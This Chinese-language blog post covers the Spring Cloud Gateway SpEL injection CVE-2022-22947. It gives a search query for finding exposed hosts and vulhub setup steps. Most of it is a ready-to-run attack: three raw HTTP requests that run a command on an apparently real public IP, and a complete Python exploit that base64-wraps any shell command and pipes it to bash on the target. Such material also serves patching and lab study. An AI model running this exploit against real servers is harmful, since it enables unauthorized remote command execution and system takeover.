遵纪守法
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益
漏洞描述:
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
漏洞影响:
3.1.0、 3.0.0至3.0.6、 3.0.0之前的版本
案例
app="vmware-SpringBoot-framework"
环境搭建
# 下载包
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
# 解压包
unzip vulhub-master.zip
# 进入vulhub目录,开启漏洞环境
vulhub/spring/CVE-2022-22947
docker-compose up -d
#漏洞环境拉取成功后访问
http://ip:8080/
1.png
漏洞复现
- 1
POST /actuator/gateway/routes/WeianSec HTTP/1.1
Host: 162.14.69.165:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 330
{
"id": "WeianSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
- 2
POST /actuator/gateway/refresh HTTP/1.1
Host: 162.14.69.165:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 456
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
- 3
GET /actuator/gateway/routes/WeianSec HTTP/1.1
Host: 162.14.69.165:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
2.png
exp
#!python3
import requests, json, sys, base64
#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
def rce(url, cmd):
h1 = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Content-Type': 'application/json'
}
data = {
"id": "ee",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"" + cmd +"\").getInputStream()))}"
}
}],
"uri": "http://aaaa.aa",
"order": 0
}
res1 = requests.post('{}/actuator/gateway/routes/ee'.format(url), data = json.dumps(data, ensure_ascii = False), headers = h1, verify = False)#, proxies = proxies)
res2 = requests.post('{}/actuator/gateway/refresh'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False)
res3 = requests.get('{}/actuator/gateway/routes/ee'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False)
print(res3.text)
if __name__ == "__main__":
url = sys.argv[-2]
if url[-1] == '/':
url = url[:-1]
cmd = sys.argv[-1]
cmd = 'bash -c {echo,' + base64.b64encode(cmd.encode()).decode() + '}|{base64,-d}|{bash,-i}'
if not (url.startswith('http://') or url.startswith('https://')):
print('使用: python cve-2022-22947.py url cmd')
sys.exit(1)
rce(url, cmd)
网友评论